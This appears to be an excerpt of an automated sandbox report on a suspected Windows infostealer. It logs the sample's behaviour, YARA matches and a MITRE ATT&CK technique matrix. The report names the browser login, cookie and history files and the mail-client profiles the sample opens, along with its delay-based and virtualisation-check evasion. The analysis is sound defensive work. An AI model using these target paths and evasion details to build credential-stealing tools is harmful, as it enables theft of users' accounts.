            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598699Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598579Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598454Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598329Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598204Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 598079Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597954Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597829Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597704Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597583Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597454Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597329Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597204Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 597079Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596954Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596829Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596704Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596579Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596454Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596329Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596204Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 596079Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595954Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595822Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595657Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595537Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595407Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595282Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595157Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 595043Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594704Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594579Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594454Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594329Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594204Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 594079Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 593954Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeThread delayed: delay time: 593829Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd602ac456f2b6<
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd60976c69a7f8<
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd60ef14f4b094<
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd5fe73a8a400c<
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd5f79cbeac367<
            Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004730000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.3004838964.0000000004730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd5f1a7d0f69c8<
            Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.00000000046E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXhs
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd5ef2e8206767<
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd5f45bd19a0d5<
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd5fb00e832d02<
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeAPI call chain: ExitProcess graph end nodegraph_0-4198
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeAPI call chain: ExitProcess graph end nodegraph_0-4029
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_738F1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_738F1A98
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess created: C:\Users\user\Desktop\CWu89IbJQw.exe "C:\Users\user\Desktop\CWu89IbJQw.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeQueries volume information: C:\Users\user\Desktop\CWu89IbJQw.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CWu89IbJQw.exe PID: 2628, type: MEMORYSTR
            Source: Yara matchFile source: 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: Process Memory Space: CWu89IbJQw.exe PID: 2628, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CWu89IbJQw.exe PID: 2628, type: MEMORYSTR
            Source: Yara matchFile source: 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            12
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            3
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets14
            File and Directory Discovery
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.